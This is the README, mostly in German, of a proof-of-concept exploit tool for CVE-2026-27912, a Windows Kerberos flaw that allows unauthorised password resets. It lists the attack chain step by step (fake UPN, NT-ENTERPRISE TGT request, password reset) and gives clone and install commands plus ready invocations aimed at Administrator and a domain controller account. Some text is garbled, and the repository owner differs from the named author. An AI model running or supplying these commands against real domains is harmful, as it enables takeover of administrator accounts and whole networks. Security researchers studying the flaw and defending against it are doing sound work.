
PoC für CVE-2026-27912 - Windows-Kerberos-Privilegienausweitung (ResetNightmare). Unbefugtes Zurücksetzen von Passwörtern über eine Kerberos-Schwachstelle. Nur für Sicherheitsforschung.
CVE-2026-27912 – Windows-Kerberos-Sicherheitsanfälligkeit (Erhöhung von Berechtigungen)
ResetNightmare – Nicht autorisiertes Zurücksetzen von Passwörtern durch einen Fehler im Kerberos-Kennwortänderungsprotokoll.
| Feld | Wert |
|---|---|
| CVE | CVE-2026-27912 |
| Titel | Windows-Kerberos-Sicherheitsanfälligkeit (Erhöhung von Berechtigungen) |
| CVSS | 8.0 HOCH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: Unzureichende Autorisierung |
| Veröffentlicht | 14. April 2026 |
| Behoben | April 2026 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
Nur für autorisierte Sicherheitstests und zu Bildungs- und Forschungszwecken.
Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für den Missbrauch dieser Software.
n0vax1337 / Sicherheitsforscher
MIT-Lizenz – siehe LICENSE
Zuletzt aktualisiert: 2026
| Flag | Beschreibung | Standard |
|---|
-t / --target | Name des Zielkontos | erforderlich |
-p / --new-password | Neues Passwort für das Ziel | erforderlich |
-u / --upn-user | Konto, auf dem die gefälschte UPN gesetzt wird | erforderlich |
-up / --upn-password | Passwort für das UPN-Konto | erforderlich |
-c / --computer | UPNUser ist ein Computerkonto | Flag |
-r / --rubeus-path | Pfad zu Rubeus.exe | Rubeus.exe |
-e / --encryption | Unterstützter Verschlüsselungstyp | AES256 |
-path / --create-path | OU-Pfad zum Erstellen eines neuen Kontos | "" |
-d / --dc | Name des Domänencontrollers | automatisch erkennen |
-v / --verbose | Ausführliche Ausgabe | Flag |